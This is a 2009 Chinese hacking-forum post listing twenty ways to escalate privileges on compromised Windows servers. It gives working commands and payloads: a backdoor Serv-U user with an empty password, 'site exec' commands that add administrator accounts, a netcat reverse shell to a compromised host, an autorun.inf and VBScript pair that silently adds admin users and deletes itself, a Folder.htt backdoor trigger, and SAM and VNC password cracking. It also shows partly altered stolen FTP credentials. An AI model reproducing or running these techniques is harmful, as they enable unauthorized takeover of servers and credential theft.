WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2198查看
  • 0回复

主题

好友

-50

积分

禁止访问

发表于 2009-12-23 00:34:42 |显示全部楼层
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。也可以分别上传 admdll.dll,raddrv.dll,r_server.exe,再分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。


2.pcanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的CIF文件,在本地安装pcanywhere上去(可惜我试了仍旧不行啊!)


3.SAM破解


C:\WINNT\system32\config\ 下他的SAM 破解之后进行远程连接。(可惜我的权限太小了,不能复制该文件)


4.su密码夺取,修改对方ServUDaemon.ini
C:\Documents and Settings\All Users\「开始」菜单\程序\
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限


5.su覆盖提权,覆盖本地ServUDaemon.ini
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了


6.su+fpipe转发端口
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是将4444端口映射到43958端口上。然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了,接下来就是登陆了,登陆FTP一定要在CMD下登陆,进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add


7.su溢出+nc转发端口


复制su的溢出程序srv.exe和nc.exe上去,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。


8.c:\winnt\system32\inetsrv\data\

这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 (能执行的话就好咯,看运气吧)


9.asp.dll特权提升
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去


cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把
asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

10.脚本提权
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs

11.VNC

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。





12.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮
箱号 手机号 尽量看看

13.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令


14.replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/R] [/S] [/W]

 [drive1:][path1]filename 指定源文件。
 [drive2:][path2] 指定要替换文件的目录。
 /A 把新文件加入目标目录。不能和/S 或 /U 命令行开关搭配使用。
 /P 替换文件或加入源文件之前会先提示您进行确认。
 /R 替换只读文件以及未受保护的文件。
 /S 替换目标目录中所有子目录的文件。不能与 /A 命令选项搭配使用。
 /W 等您插入磁盘以后再运行。
 /U 只会替换或更新比源文件日期早的文件。不能与 /A 命令行开关搭配使用


15.autorun .inf加 SHELL.VBS
autorun.inf
[autorun] open=shell.vbs

shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

16.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义
文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”>
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门


17SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。


引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了


18.Magic Winmail
前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧

19.脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:
[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到“C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts”
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限



20. FlashFXP密码查找法
在C:\\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的,用xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-21 16:11 , Processed in 0.067519 second(s), 16 queries .

返回顶部